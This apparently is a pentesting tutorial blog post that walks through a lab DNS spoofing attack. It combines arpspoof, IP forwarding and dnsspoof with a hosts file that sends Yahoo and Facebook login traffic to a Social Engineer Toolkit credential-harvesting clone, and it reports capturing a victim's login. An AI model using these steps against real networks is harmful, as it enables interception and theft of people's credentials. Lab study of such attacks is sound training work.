Tips for an Information Security Analyst/Pentester career - Ep. 38: DNS Spoofing

This post is an ideal continuation of the previous episode  but this time we're going to deal with DNS spoofing.

Along with ARP spoofing, we can launch DNS poisoning attacks, in order to redirect our victim to a fake website and grab his/her credentials.

Compared with the attack Georgia Weidman performs in her class, I brought this technique to the next level by creating a fake clone for Yahoo! through the Social Engineer Toolkit (credential harvester). I was then unsatisfied by the results and performed the same attack against Facebook, more successfully (view the embedded video for more details).

NOTATION: Credential harvester will ask you to disable Apache server, because it creates a fake website running on port 80.

You need to enter yes.

We don't need Apache server running on that same port, because that would prevent our malicious clone from running.

In her class, Georgia doesn't create a clone, but I did it here. 

Of course, the concept is exactly the same, by this I surely don't mean any disrespecting or belittling of Georgia's amazing work.

For the purpose of this attack, I created a text file called hosts.txt where I stored two manual entries for https://login.yahoo.com and for www.facebook.com, matching them with the IP address of my Kali VM (192.168.1.92).

As we did for ARP spoofing, we need to make sure the extraneous traffic we'll receive will be redirected to the victim, otherwise we would cause a denial of service.

For this purpose, we need to edit the /proc/sys/net/ipv4/ip_forward file by changing its value from 0 (false) to 1 (true).

Then we need to perform an ARP spoofing attack between the router (or gateway) and our target machine. we're going to use the same command as before ( arpspoof - i <network interface to use> -t <target IP address>  <IP address we want to impersonate>), but this time we'll need the IP address of the target machine and the IP address of the router.

That being done, we'll perform a DNS spoofing attack by launching the following command: dnsspoof -i <name of the interface> -f <malicious hosts file>.

In our case, it'll look like this:

As a result of this attack, we could successfully grab the victim's credential from Facebook (of course, it's a mere example, as I don't have any Facebook account).

The beauty of all this is all this process is totally invisible to the target machine.

Episode 39

Episode 37